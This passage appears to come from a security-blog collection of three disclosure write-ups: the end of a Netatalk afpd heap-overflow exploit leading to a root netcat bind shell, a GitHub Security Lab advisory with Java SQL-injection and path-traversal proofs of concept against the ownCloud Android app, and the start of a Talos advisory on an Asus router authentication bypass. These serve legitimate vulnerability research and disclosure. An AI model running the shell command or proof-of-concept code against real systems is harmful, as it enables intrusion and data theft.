        hash->table = malloc(sizeof *hash->table * INIT_SIZE);  /* 4 */
        if (hash->table) {  /* 5 */
            hash->nchains = INIT_SIZE;      /* 6 */
            hash->highmark = INIT_SIZE * 2;
            hash->lowmark = INIT_SIZE / 2;
            hash->nodecount = 0;
            hash->maxcount = maxcount;
            hash->compare = compfun ? compfun : hash_comp_default;
            hash->function = hashfun ? hashfun : hash_fun_default;
            hash->allocnode = hnode_alloc;
            hash->freenode = hnode_free;
            hash->context = NULL;
            hash->mask = INIT_MASK;
            hash->dynamic = 1;          /* 7 */
            clear_table(hash);          /* 8 */
            assert (hash_verify(hash));
            return hash;
        }
        free(hash);
    }
    return NULL;
}

The 

hash_t
 structure is very distinct from other data and contains pointers on the 
hnode_alloc()
 and 
hnode_free()
functions that are located in the afpd main image.
Therefore by parsing the received leak, we can look for 
hash_t
 patterns and recover the ASLR slide of the main binary. This method is implemented in the exploit in the function 
parse_leak()
.

Regrettably this strategy is not 100% reliable depending on the heap initialization of afpd.
There might be non-mapped memory ranges after the 

dsi
 struct, crashing the daemon while trying to send the leak.
In that case, the exploit won’t work until the device (or daemon) get restarted.
Fortunately, this situation seems rare (less than 20% of the cases) giving the exploit a fair chance of success.

BUILDING A WRITE PRIMITIVE

Now that we know where the main image and heap are located into the server memory, it is possible to use the full potential of the vulnerability and overflow the rest of the 

struct *DSI
 to reach code execution.

Rewriting 

dsi-&gt;proto_close
 looks like a promising way to get the control of the flow. However because of the lack of control on the arguments, we’ve chosen another exploitation method that works equally well on all architectures but requires the ability to write arbitrary data at a chosen location.


The look ahead pointers of the 

DSI
 structure seem like a nice opportunity to achieve a controlled write.

typedef struct DSI {
    /* ... */
    uint8_t  data[DSI_DATASIZ];
    size_t   datalen, cmdlen; /* begining of the overflow */
    off_t    read_count, write_count;
    uint32_t flags;             /* DSI flags like DSI_SLEEPING, DSI_DISCONNECTED */
    int      socket;            /* AFP session socket */
    int      serversock;        /* listening socket */

    /* DSI readahead buffer used for buffered reads in dsi_peek */
    size_t   dsireadbuf;        /* size of the DSI readahead buffer used in dsi_peek() */
    char     *buffer;           /* buffer start */
    char     *start;            /* current buffer head */
    char     *eof;              /* end of currently used buffer */
    char     *end;

    /* ... */
} DSI;

By setting 

dsi-&gt;buffer
 to the location we want to write and 
dsi-&gt;end
 as the upper bound of the writing location, the next command buffered by the server can end-up at a controlled address.

One should takes care while setting 

dsi->start
 and 
dsi->eof
, because they are reset to 
dsi->buffer
 after the overflow in 
dsi_writeinit()
:

    if (dsi->eof > dsi->start) {
        /* We have data in the buffer */
        bytes = MIN(dsi->eof - dsi->start, dsi->datasize);
        memmove(buf, dsi->start, bytes);
        dsi->start += bytes;         // the overflowed value is changed back here ...
        dsi->datasize -= bytes;
        if (dsi->start >= dsi->eof)
            dsi->start = dsi->eof = dsi->buffer; // ... and there
    }

As seen in the snippet, this is only a matter of setting 

dsi-&gt;start
 greater than 
dsi-&gt;eof
 during the overflow.

So to get a write primitive one should:

  1. Overflow 
    dsi-&gt;buffer
    dsi-&gt;end
    dsi-&gt;start
     and 
    dsi-&gt;eof
     according to the write location.
  2. Send two commands in the same TCP segment.

The first command is just a dummy one, and the second command contains the data to write.

Sending two commands here seems odd but it it necessary to trigger the arbitrary write, because of the convoluted reception mechanism of 

dsi_stream_read()
.

When receiving the first command, 

dsi_buffered_stream_read()
 will skip the non-blocking call to 
recv()
 and take the blocking receive path in 
dsi_stream_read()
 -> 
buf_read()
 -> 
readt()
.

The controlled write happens during the reception of the second command. Because the two commands were sent in the same TCP segment, the data of the second one is most likely to be available on the socket. Therefore the non-blocking 

recv()
 should succeed and write at 
dsi-&gt;eof
.

COMMAND EXECUTION

With the ability to write arbitrary data at a chosen location it is now possible to take control of the remote program.

The most obvious location to write to is the array 

preauth_switch
:

static AFPCmd preauth_switch[] = {
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*   0 -   7 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*   8 -  15 */
    NULL, NULL, afp_login, afp_logincont,
    afp_logout, NULL, NULL, NULL,               /*  16 -  23 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*  24 -  31 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*  32 -  39 */
    NULL, NULL, NULL, NULL,
    ...

As seen previously, this array is used in 

afp_over_dsi()
 to dispatch the client 
DSICommand
 requests. By writing an arbitrary entry in the table, it is then possible to perform the following call with a controlled function pointer:

err = (*afp_switch[function])(obj,
                (char *)dsi->commands, dsi->cmdlen,
                (char *)&dsi->data, &dsi->datalen);

One excellent candidate to replace 

preauth_switch[function]
 with is 
afprun()
. This function is used by the server to launch a shell command, and can even do so with root privileges 🙂

int afprun(int root, char *cmd, int *outfd)
{
    pid_t pid;
    uid_t uid = geteuid();
    gid_t gid = getegid();

    /* point our stdout at the file we want output to go into */
    if (outfd && ((*outfd = setup_out_fd()) == -1)) {
        return -1;
    }

    /* ... */

    if ((pid=fork()) < 0) { /* ... */ }

    /* ... */

    /* now completely lose our privileges. This is a fairly paranoid
       way of doing it, but it does work on all systems that I know of */
    if (root) {
        become_user_permanently(0, 0);
        uid = gid = 0;
    }
    else {
        become_user_permanently(uid, gid);
    }

    /* ... */

    execl("/bin/sh","sh","-c",cmd,NULL);
    /* not reached */
    exit(82);
    return 1;
}

So to get a command executed as root, we transform the call:

(*afp_switch[function])(obj, dsi->commands, dsi->cmdlen, [...]);

into

afprun(int root, char *cmd, int *outfd)

The situation is the following:

  •  
    function
     is chosen by the client so that 
    afp_switch[function]
     is the function pointer overwritten with 
    afprun
     ;
  •  
    obj
     is a non-NULL 
    AFPObj*
     pointer, which fits with the 
    root
     argument that should be non zero ;
  •  
    dsi-&gt;commands
     is a valid pointer with controllable content, where we can put a chosen command such as a binded netcat shell ;
  •  
    dsi-&gt;cmdlen
     must either be NULL or a valid pointer because 
    *outfd
     is dereferenced in 
    afprun
    .

Here is one final difficulty. It is not possible to send a 

dsi-&gt;command
 long enough so that 
dsi-&gt;cmdlen
 becomes a valid pointer.
But with a NULL 
dsi-&gt;cmdlen
dsi-&gt;command
 is not controlled anymore.

The trick is to observe that 

dsi_stream_receive()
 does not clean the 
dsi-&gt;command
 in between client requests, and 
afp_over_dsi()
 does not check 
cmdlen
 before using 
dsi-&gt;commands[0]
.

So if a client send a DSI a packet without a 

dsi-&gt;command
 payload and a 
dsi-&gt;cmdlen
 of zero, the 
dsi-&gt;command
 remains the same as the previous command.

As a result it is possible to send:

  • A first DSI request with 
    dsi-&gt;command
     being something similar to 
    &lt;function_id&gt; ; /sbin/busybox nc -lp &lt;PORT&gt; -e /bin/sh;
    .
  • A second DSI request with a zero 
    dsi-&gt;cmdlen
    .

This ends up calling:

(*afp_switch[function_id])(obj,"<function_id> ; /sbin/busybox nc -lp <PORT> -e /bin/sh;", 0, [...])

which is what was required to get RCE once 

afp_switch[function_id]
 was overwritten with 
afprun
.


As a final optimization, it is even possible to send the last two DSI packets triggering code execution as the last two commands required for the write primitive.
This results in doing the 

preauth_switch
 overwrite and the 
dsi-&gt;command
dsi-&gt;cmdlen
 setup at the same time.
As a matter of fact, this is even easier to mix both because of a detail that is not worth explaining into that write-up.
The interested reader can refer to the exploit commentaries.

PUTTING THINGS TOGETHER

To sum up here is an overview of the exploitation process:

  1. Setting up the connection.
  2. Triggering the vulnerability with a 4 bytes overflow to rewrite 
    dsi-&gt;datalen.
  3. Sending a command with a previously used 
    clientID
     to trigger the leak.
  4. Parsing the leak while looking for 
    hash_t
     struct, giving pointers to the afpd main image.
  5. Closing the old connection and setting up a new connection.
  6. Triggering the vulnerability with a larger overflow to rewrite the look ahead buffer pointers of the 
    dsi
     struct.
  7. Sending both requests as one:
    1. A first 
      DSICommand
       with the content 
      "&lt;function_id&gt; ; /sbin/busybox nc -lp &lt;PORT&gt; -e /bin/sh;"
       ;
    2. A second 
      DSICommand
       with the content 
      &amp;afprun
       but with a zero length 
      dsi_len
       and 
      dsi-&gt;cmdlen.
  8. Sending a 
    DSICommand
     without content to trigger the command execution.

CONCLUSION

During this research we developed a working exploit for the latest version of Netatalk. It uses a single heap overflow vulnerability to bypass all mitigations and obtain command execution as root. On the MyCloud Home the afpd services was configured to allow guest authentication, but since the bug was accessible prior to authentication the exploit works even if guest authentication is disabled.

The funkiest part was undoubtedly implementing a custom TCP stack to trigger the bug. This is quite uncommon for an user land and real life (as not in a CTF) exploit, and we hope that was entertaining for the reader.

Our exploit will be published on GitHub after a short delay. It should work as it on the targeted device. Adapting it to other distributions should require some minor tweaks and is left as an exercise.

Unfortunately, our Pwn2Own entry ended up being a duplicate with the Mofoffensive team who targeted another device that shipped an older version of Netatalk. In this previous release the vulnerability was in essence already there, but maybe a little less fun to exploit as it did not required to mess with the network stack.

We would like to thank:

  • ZDI and Western Digital for their organization of the P2O competition, especially this session considering the number of teams and their help to setup an environment for our exploit ;
  • The Netatalk team for the considerable amount of work and effort they put into this Open Source project.

TIMELINE

  • 2022-06-03 — Vulnerability reported to vendor
  • 2023-02-06 — Coordinated public release of advisory

GHSL-2022-059_GHSL-2022-060: SQL injection vulnerabilities in Owncloud Android app — CVE-2023-24804, CVE-2023-23948

GHSL-2022-059_GHSL-2022-060: SQL injection vulnerabilities in Owncloud Android app - CVE-2023-24804, CVE-2023-23948

Original text by GitHub Security Lab

Coordinated Disclosure Timeline

  • 2022-07-26: Issues notified to ownCloud through HackerOne.
  • 2022-08-01: Report receipt acknowledged.
  • 2022-09-07: We request a status update for GHSL-2022-059.
  • 2022-09-08: ownCloud says that they are still working on the fix for GHSL-2022-059.
  • 2022-10-26: We request a status update for GHSL-2022-060.
  • 2022-10-27: ownCloud says that they are still working on the fix for GHSL-2022-060.
  • 2022-11-28: We request another status update for GHSL-2022-059.
  • 2022-11-28: ownCloud says that the fix for GHSL-2022-059 will be published in the next release.
  • 2022-12-12: Version 3.0 is published.
  • 2022-12-20: We verify that version 3.0 fixed GHSL-2022-060.
  • 2022-12-20: We verify that the fix for GHSL-2022-059 was not included in the release. We ask ownCloud about it.
  • 2023-01-31: ownCloud informs us that in 3.0 the filelist database was deprecated (empty, only used for migrations from older versions) and planned to be removed in a future version.
  • 2023-01-31: We answer that, while that would mitigate one of the reported injections, the other one affects the 
    owncloud_database
     database, which remains relevant.
  • 2023-02-2: Publishing advisories as per our disclosure policy.

Summary

The Owncloud Android app uses content providers to manage its data. The provider 

FileContentProvider
 has SQL injection vulnerabilities that allow malicious applications or users in the same device to obtain internal information of the app.

The app also handles externally-provided files in the activity 

ReceiveExternalFilesActivity
, where potentially malicious file paths are not properly sanitized, allowing attackers to read from and write to the application’s internal storage.

Product

Owncloud Android app

Tested Version

v2.21.1

Details

Issue 1: SQL injection in 
FileContentProvider.kt
 (
GHSL-2022-059
)

The 

FileContentProvider
 provider is exported, as can be seen in the Android Manifest:

<provider
    android:name=".providers.FileContentProvider"
    android:authorities="@string/authority"
    android:enabled="true"
    android:exported="true"
    android:label="@string/sync_string_files"
    android:syncable="true" />

All tables in this content provider can be freely interacted with by other apps in the same device. By reviewing the entry-points of the content provider for those tables, it can be seen that several user-controller parameters end up reaching an unsafe SQL method that allows for SQL injection.

The 
delete
 method

User input enters the content provider through the three parameters of this method:

override fun delete(uri: Uri, where: String?, whereArgs: Array<String>?): Int {

The 

where
 parameter reaches the following dangerous arguments without sanitization:

private fun delete(db: SQLiteDatabase, uri: Uri, where: String?, whereArgs: Array<String>?): Int {
    // --snip--
    when (uriMatcher.match(uri)) {
        SINGLE_FILE -> {
            // --snip--
            count = db.delete(
                ProviderTableMeta.FILE_TABLE_NAME,
                ProviderTableMeta._ID +
                        "=" +
                        uri.pathSegments[1] +
                        if (!TextUtils.isEmpty(where))
                            " AND ($where)" // injection
                        else
                            "", whereArgs
            )
        }
        DIRECTORY -> {
            // --snip--
            count += db.delete(
                ProviderTableMeta.FILE_TABLE_NAME,
                ProviderTableMeta._ID + "=" +
                        uri.pathSegments[1] +
                        if (!TextUtils.isEmpty(where))
                            " AND ($where)" // injection
                        else
                            "", whereArgs
            )
        }
        ROOT_DIRECTORY ->
            count = db.delete(ProviderTableMeta.FILE_TABLE_NAME, where, whereArgs) // injection
        SHARES -> count =
            OwncloudDatabase.getDatabase(MainApp.appContext).shareDao().deleteShare(uri.pathSegments[1])
        CAPABILITIES -> count = db.delete(ProviderTableMeta.CAPABILITIES_TABLE_NAME, where, whereArgs) // injection
        UPLOADS -> count = db.delete(ProviderTableMeta.UPLOADS_TABLE_NAME, where, whereArgs) // injection
        CAMERA_UPLOADS_SYNC -> count = db.delete(ProviderTableMeta.CAMERA_UPLOADS_SYNC_TABLE_NAME, where, whereArgs) // injection
        QUOTAS -> count = db.delete(ProviderTableMeta.USER_QUOTAS_TABLE_NAME, where, whereArgs) // injection
        // --snip--
    }
    // --snip--
}

The 
insert
 method

User input enters the content provider through the two parameters of this method:

override fun insert(uri: Uri, values: ContentValues?): Uri? {

The 

values
 parameter reaches the following dangerous arguments without sanitization:

private fun insert(db: SQLiteDatabase, uri: Uri, values: ContentValues?): Uri {
    when (uriMatcher.match(uri)) {
        ROOT_DIRECTORY, SINGLE_FILE -> {
            // --snip--
            return if (!doubleCheck.moveToFirst()) {
                // --snip--
                val fileId = db.insert(ProviderTableMeta.FILE_TABLE_NAME, null, values) // injection
                // --snip--
            }
            // --snip--
        }
        // --snip--

        CAPABILITIES -> {
            val capabilityId = db.insert(ProviderTableMeta.CAPABILITIES_TABLE_NAME, null, values) // injection
            // --snip--
        }

        UPLOADS -> {
            val uploadId = db.insert(ProviderTableMeta.UPLOADS_TABLE_NAME, null, values) // injection
            // --snip--
        }

        CAMERA_UPLOADS_SYNC -> {
            val cameraUploadId = db.insert(
                ProviderTableMeta.CAMERA_UPLOADS_SYNC_TABLE_NAME, null,
                values // injection
            )
            // --snip--
        }
        QUOTAS -> {
            val quotaId = db.insert(
                ProviderTableMeta.USER_QUOTAS_TABLE_NAME, null,
                values // injection
            )
            // --snip--
        }
        // --snip--
    }
}

The 
query
 method

User input enters the content provider through the five parameters of this method:

override fun query(
    uri: Uri,
    projection: Array<String>?,
    selection: String?,
    selectionArgs: Array<String>?,
    sortOrder: String?
): Cursor {

The 

selection
 and 
sortOrder
 parameters reach the following dangerous arguments without sanitization (note that 
projection
 is safe because of the use of a projection map):

SHARES -> {
    val supportSqlQuery = SupportSQLiteQueryBuilder
        .builder(ProviderTableMeta.OCSHARES_TABLE_NAME)
        .columns(computeProjection(projection))
        .selection(selection, selectionArgs) // injection
        .orderBy(
            if (TextUtils.isEmpty(sortOrder)) {
                sortOrder // injection
            } else {
                ProviderTableMeta.OCSHARES_DEFAULT_SORT_ORDER
            }
        ).create()

    // To use full SQL queries within Room
    val newDb: SupportSQLiteDatabase =
        OwncloudDatabase.getDatabase(MainApp.appContext).openHelper.writableDatabase
    return newDb.query(supportSqlQuery)
}

val c = sqlQuery.query(db, projection, selection, selectionArgs, null, null, order)

The 
update
 method

User input enters the content provider through the four parameters of this method:

override fun update(uri: Uri, values: ContentValues?, selection: String?, selectionArgs: Array<String>?): Int {

The 

values
 and 
selection
 parameters reach the following dangerous arguments without sanitization:

private fun update(
        db: SQLiteDatabase,
        uri: Uri,
        values: ContentValues?,
        selection: String?,
        selectionArgs: Array<String>?
): Int {
    if (selection != null && selectionArgs == null) {
        throw IllegalArgumentException("Selection not allowed, use parameterized queries")
    }
    when (uriMatcher.match(uri)) {
        DIRECTORY -> return 0 //updateFolderSize(db, selectionArgs[0]);
        SHARES -> return values?.let {
            OwncloudDatabase.getDatabase(context!!).shareDao()
                .update(OCShareEntity.fromContentValues(it)).toInt()
        } ?: 0
        CAPABILITIES -> return db.update(ProviderTableMeta.CAPABILITIES_TABLE_NAME, values, selection, selectionArgs) // injection
        UPLOADS -> {
            val ret = db.update(ProviderTableMeta.UPLOADS_TABLE_NAME, values, selection, selectionArgs) // injection
            trimSuccessfulUploads(db)
            return ret
        }
        CAMERA_UPLOADS_SYNC -> return db.update(ProviderTableMeta.CAMERA_UPLOADS_SYNC_TABLE_NAME, values, selection, selectionArgs) // injection
        QUOTAS -> return db.update(ProviderTableMeta.USER_QUOTAS_TABLE_NAME, values, selection, selectionArgs) // injection
        else -> return db.update(
            ProviderTableMeta.FILE_TABLE_NAME, values, selection, selectionArgs // injection
        )
    }
}

Impact

There are two databases affected by this vulnerability: 

filelist
 and 
owncloud_database
.

Since the tables in 

filelist
 are affected by the injections in the 
insert
 and 
update
 methods, an attacker can use those to insert a crafted row in any table of the database containing data queried from other tables. After that, the attacker only needs to query the crafted row to obtain the information (see the 
Resources
 section for a PoC). Despite that, currently all tables are legitimately exposed through the content provider itself, so the injections cannot be exploited to obtain any extra data. Nonetheless, if new tables were added in the future that were not accessible through the content provider, those could be accessed using these vulnerabilities.

Regarding the tables in 

owncloud_database
, there are two that are not accessible through the content provider: 
room_master_table
 and 
folder_backup
. An attacker can exploit the vulnerability in the 
query
 method to exfiltrate data from those. Since the 
strictMode
 is enabled in the 
query
method, the attacker needs to use a Blind SQL injection attack to succeed (see the 
Resources
section for a PoC).

In both cases, the impact is information disclosure. Take into account that the tables exposed in the content provider (most of them) are arbitrarily modifiable by third party apps already, since the 

FileContentProvider
 is exported and does not require any permissions.

Resources

SQL injection in 
filelist

The following PoC demonstrates how a malicious application with no special permissions could extract information from any table in the 

filelist
 database exploiting the issues mentioned above:

package com.example.test;

import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import android.util.Log;

public class OwncloudProviderExploit {

    public static String exploit(Context ctx, String columnName, String tableName) throws Exception {
        Uri result = ctx.getContentResolver().insert(Uri.parse("content://org.owncloud/file"), newOwncloudFile());
        ContentValues updateValues = new ContentValues();
        updateValues.put("etag=?,path=(SELECT GROUP_CONCAT(" + columnName + ",'\n') " +
                "FROM " + tableName + ") " +
                "WHERE _id=" + result.getLastPathSegment() + "-- -", "a");
        Log.e("test", "" + ctx.getContentResolver().update(
                result, updateValues, null, null));
        String query = query(ctx, new String[]{"path"},
                "_id=?", new String[]{result.getLastPathSegment()});
        deleteFile(ctx, result.getLastPathSegment());
        return query;
    }

    public static String query(Context ctx, String[] projection, String selection, String[] selectionArgs) throws Exception {
        try (Cursor mCursor = ctx.getContentResolver().query(Uri.parse("content://org.owncloud/file"),
                projection,
                selection,
                selectionArgs,
                null)) {
            if (mCursor == null) {
                Log.e("evil", "mCursor is null");
                return "0";
            }
            StringBuilder output = new StringBuilder();
            while (mCursor.moveToNext()) {
                for (int i = 0; i < mCursor.getColumnCount(); i++) {
                    String column = mCursor.getColumnName(i);
                    String value = mCursor.getString(i);
                    output.append("|").append(column).append(":").append(value);
                }
                output.append("\n");
            }
            return output.toString();
        }
    }

    private static ContentValues newOwncloudFile() throws Exception {
        ContentValues values = new ContentValues();
        values.put("parent", "a");
        values.put("filename", "a");
        values.put("created", "a");
        values.put("modified", "a");
        values.put("modified_at_last_sync_for_data", "a");
        values.put("content_length", "a");
        values.put("content_type", "a");
        values.put("media_path", "a");
        values.put("path", "a");
        values.put("file_owner", "a");
        values.put("last_sync_date", "a");
        values.put("last_sync_date_for_data", "a");
        values.put("etag", "a");
        values.put("share_by_link", "a");
        values.put("shared_via_users", "a");
        values.put("permissions", "a");
        values.put("remote_id", "a");
        values.put("update_thumbnail", "a");
        values.put("is_downloading", "a");
        values.put("etag_in_conflict", "a");
        return values;
    }

    public static String deleteFile(Context ctx, String id) throws Exception {
        ctx.getContentResolver().delete(
                Uri.parse("content://org.owncloud/file/" + id),
                null,
                null
        );
        return "1";
    }
}

By providing a columnName and tableName to the exploit function, the attacker takes advantage of the issues explained above to:

  • Create a new file entry in 
    FileContentProvider
    .
  • Exploit the SQL Injection in the 
    update
     method to set the 
    path
     of the recently created file to the values of 
    columnName
     in the table 
    tableName
    .
  • Query the 
    path
     of the modified file entry to obtain the desired values.
  • Delete the file entry.

For instance, 

exploit(context, "name", "SQLITE_MASTER WHERE type="table")
 would return all the tables in the 
filelist
 database.

Blind SQL injection in 
owncloud_database

The following PoC demonstrates how a malicious application with no special permissions could extract information from any table in the 

owncloud_database
 database exploiting the issues mentioned above using a Blind SQL injection technique:

package com.example.test;

import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import android.util.Log;

public class OwncloudProviderExploit {

    public static String blindExploit(Context ctx) {
        String output = "";
        String chars = "abcdefghijklmopqrstuvwxyz0123456789";
        while (true) {
            int outputLength = output.length();
            for (int i = 0; i < chars.length(); i++) {
                char candidate = chars.charAt(i);
                String attempt = String.format("%s%c%s", output, candidate, "%");
                try (Cursor mCursor = ctx.getContentResolver().query(
                        Uri.parse("content://org.owncloud/shares"),
                        null,
                        "'a'=? AND (SELECT identity_hash FROM room_master_table) LIKE '" + attempt + "'",
                        new String[]{"a"}, null)) {
                    if (mCursor == null) {
                        Log.e("ProviderHelper", "mCursor is null");
                        return "0";
                    }
                    if (mCursor.getCount() > 0) {
                        output += candidate;
                        Log.i("evil", output);
                        break;
                    }
                }
            }
            if (output.length() == outputLength)
                break;
        }
        return output;
    }

}

Issue 2: Insufficient path validation in 
ReceiveExternalFilesActivity.java
 (
GHSL-2022-060
)

Access to arbitrary files in the app’s internal storage fix bypass

ReceiveExternalFilesActivity
 handles the upload of files provided by third party components in the device. The received data can be set arbitrarily by attackers, causing some functions that handle file paths to have unexpected behavior. https://hackerone.com/reports/377107 shows how that could be exploited in the past, using the 
"android.intent.extra.STREAM
 extra to force the application to upload its internal files, like 
com.owncloud.android_preferences.xml
. To fix it, the following code was added:

private void prepareStreamsToUpload() {
    // --snip--

    for (Uri stream : mStreamsToUpload) {
        String streamToUpload = stream.toString();
        if (streamToUpload.contains("/data") &&
                streamToUpload.contains(getPackageName()) &&
                !streamToUpload.contains(getCacheDir().getPath())
        ) {
            finish();
        }
    }
}

This protection can be bypassed in two ways:

  • Using the path returned by 
    getCacheDir()
     in the payload, e.g. 
    "file:///data/user/0/com.owncloud.android/cache/../shared_prefs/com.owncloud.android_preferences.xml"
    .
  • Using a content provider URI that uses the 
    org.owncloud.files
     provider to access the app’s internal 
    file
     folder, e.g. 
    "content://org.owncloud.files/files/owncloud/logs/owncloud.2022-07-25.log"
    .

With those payloads, the original issue can be still exploited with the same impact.

Write of arbitrary 
.txt
 files in the app’s internal storage

Additionally, there’s another insufficient path validation when uploading a plain text file that allows to write arbitrary files in the app’s internal storage.

When uploading a plain text file, the following code is executed, using the user-provided text at 

input
 to save the file:

ReceiveExternalFilesActivity:920

private void showUploadTextDialog() {
        // --snip--
        final TextInputEditText input = dialogView.findViewById(R.id.inputFileName);
        // --snip--
        setFileNameFromIntent(alertDialog, input);
        alertDialog.setOnShowListener(dialog -> {
            Button button = alertDialog.getButton(AlertDialog.BUTTON_POSITIVE);
            button.setOnClickListener(view -> {
                // --snip--
                } else {
                    fileName += ".txt";
                    Uri fileUri = savePlainTextToFile(fileName);
                    mStreamsToUpload.clear();
                    mStreamsToUpload.add(fileUri);
                    uploadFiles();
                }
                inputLayout.setErrorEnabled(error != null);
                inputLayout.setError(error);
            });
        });
        alertDialog.show();
    }

By reviewing 

savePlainTextToFile
, it can be seen that the plain text file is momentarily saved in the app’s cache, but the destination path is built using the user-provided 
fileName
:

ReceiveExternalFilesActivity:983

private Uri savePlainTextToFile(String fileName) {
    Uri uri = null;
    String content = getIntent().getStringExtra(Intent.EXTRA_TEXT);
    try {
        File tmpFile = new File(getCacheDir(), fileName); // here
        FileOutputStream outputStream = new FileOutputStream(tmpFile);
        outputStream.write(content.getBytes());
        outputStream.close();
        uri = Uri.fromFile(tmpFile);

    } catch (IOException e) {
        Timber.w(e, "Failed to create temp file for uploading plain text: %s", e.getMessage());
    }
    return uri;
}

An attacker can exploit this using a path traversal attack to write arbitrary text files into the app’s internal storage or other restricted directories accessible by it. The only restriction is that the file will always have the 

.txt
 extension, limiting the impact.

Impact

These issues may lead to information disclosure when uploading the app’s internal files, and to arbitrary file write when uploading plain text files (although limited by the 

.txt
 extension).

Resources

The following PoC demonstrates how to upload arbitrary files from the app’s internal storage:

adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --eu "android.intent.extra.STREAM" "file:///data/user/0/com.owncloud.android.debug/cache/../shared_prefs/com.owncloud.android.debug_preferences.xml"

The following PoC demonstrates how to upload arbitrary files from the app’s internal 

files
directory:

adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --eu "android.intent.extra.STREAM" "content://org.owncloud.files/files/owncloud/logs/owncloud.2022-07-25.log"

The following PoC demonstrates how to write an arbitrary 

test.txt
 text file to the app’s internal storage:

adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --es "android.intent.extra.TEXT" "Arbitrary contents here" --es "android.intent.extra.TITLE" "../shared_prefs/test"

Credit

These issues were discovered and reported by the CodeQL team member @atorralba (Tony Torralba).

Contact

You can contact the GHSL team at 

securitylab@github.com
, please include a reference to 
GHSL-2022-059
 or 
GHSL-2022-060
 in any communication regarding these issues.

Asus RT-AX82U vulnerability

Asus RT-AX82U vulnerability

Original text by talosintelligence

Asus RT-AX82U get_IFTTTTtoken.cgi authentication bypass vulnerability

CVE-2022-35401

An authentication bypass vulnerability exists in the get_IFTTTTtoken.cgi functionality of Asus RT-AX82U 3.0.0.4.386_49674-ge182230. A specially-crafted HTTP request can lead to full administrative access to the device. An attacker would need to send a series of HTTP requests to exploit this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Asus RT-AX82U 3.0.0.4.386_49674-ge182230

PRODUCT URLS

RT-AX82U — https://www.asus.com/us/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AX82U/

DETAILS

The Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like basically every other router, it is configurable via a HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in a more IOT style.

In order to enable remote management and monitoring of our Asus Router, so that it behaves just like any other IoT device, there are a couple of settings changes that need to be made. First we must enable WAN access for the HTTPS server (or else nothing could manage the router), and then we must generate an access code to link our device with either Amazon Alexa or IFTTT. These options can all be found internally at 

http://router.asus.com/Advanced_Smart_Home_Alexa.asp
.

As a high level overview, upon receiving this code, the remote website will connect to your router at the 

get_IFTTTtoken.cgi
 web page and provide a 
shortToken
HTTP query parameter. Assuming this token is received within 2 minutes of the aforementioned access code being generated, and also assuming this token matches what’s in the router’s nvram, the router will respond back with an 
ifttt_token
 that grants full administrative capabilities to the device, just like the normal token used after logging into the device via the HTTP server.

0002863c  int32_t do_get_IFTTTToken_cgi(int32_t arg1, FILE* arg2)
00028660      char* r0 = get_UA_Type(inpstr: &user_agent)                 // [1]
00028668      char* r0_2
00028668      if (r0 != 4)   // asusrouter-Windows-IFTTT-1.0
000286b0          r0_2 = get_UA_Type(inpstr: &user_agent)

// [...]
000286cc      void var_30
000286cc      memset(&var_30, 0, 0x20)
000286d8      char* r0_4 = check_if_queryitem_exists("shortToken")        // [2]
000286e0      if (r0_4 == 0)
000286e4          r0_4 = &nullptr

000286ec      int32_t r0_5 = gen_IFTTTtoken(token: r0_4, outbuf: &var_30) // [3]

00028700      fputs(str: &(*"\tif (disk_num == %d) {\n")[0x15], fp: arg2)
00028708      fflush(fp: arg2)
0002871c      fprintf(stream: arg2, format: ""ifttt_token":"%s",\n", &var_30) // [4]
00028724      fflush(fp: arg2)
00028738      fprintf(stream: arg2, format: ""error_status":"%d"\n", r0_5)
00028740      fflush(fp: arg2)
00028750      fputs(str: &data_81196, fp: arg2)
00028760      return fflush(fp: arg2)

At [1], the function pulls out the “User-Agent” header of our HTTP GET request and checks to see if it starts with “asusrouter”. It also checks if the text after the second dash is either “IFTTT” or “Alexa”. In either of those cases, it returns 4 or 5, and we’re allowed to proceed in the code path. At [2], the function pulls out the 

shortToken
 query parameter from our HTTP GET request and passes that into the 
gen_IFTTTtoken
 function at [3]. Assuming there is a match, 
gen_IFTTTtoken
will output the 
ifttt_token
 authentication buffer to 
var_30
, which is then sent back to the HTTP sender at [4]. Looking at 
gen_IFTTTtoken
:

0007b5c8  int32_t gen_IFTTTtoken(char* token, uint8_t* outbuf)

0007b5d4      int32_t r0 = uptime()
0007b5fc      memset(&ifttt_token_copy, 0, 0x20)
0007b614      int32_t r0_8
0007b614      int32_t arg3
0007b614      int32_t arg4
0007b614      if (r0 - nvram_get_int("ifttt_timestamp") s> 120)       // [5]
0007b6ec          if (isFileExist("/tmp/IFTTT_ALEXA") s> 0)
0007b710              Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] short token timeout\n", "gen_IFTTTtoken", 0x3ff, token, outbuf, arg3, arg4)
0007b714          r0_8 = 1
0007b630      else if (nvram_get_and_cmp("ifttt_stoken", token) == 0) // [6]
0007b72c          if (isFileExist("/tmp/IFTTT_ALEXA") s> 0)
0007b760              Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] short token is not the same: endp…", "gen_IFTTTtoken", 0x402, token, p2_nvram_get(item: "ifttt_stoken"), arg3, arg4)
0007b764          r0_8 = 2
0007b64c      else if (get_UA_Type(inpstr: &user_agent) != 4)
0007b77c          if (isFileExist("/tmp/IFTTT_ALEXA") s> 0)
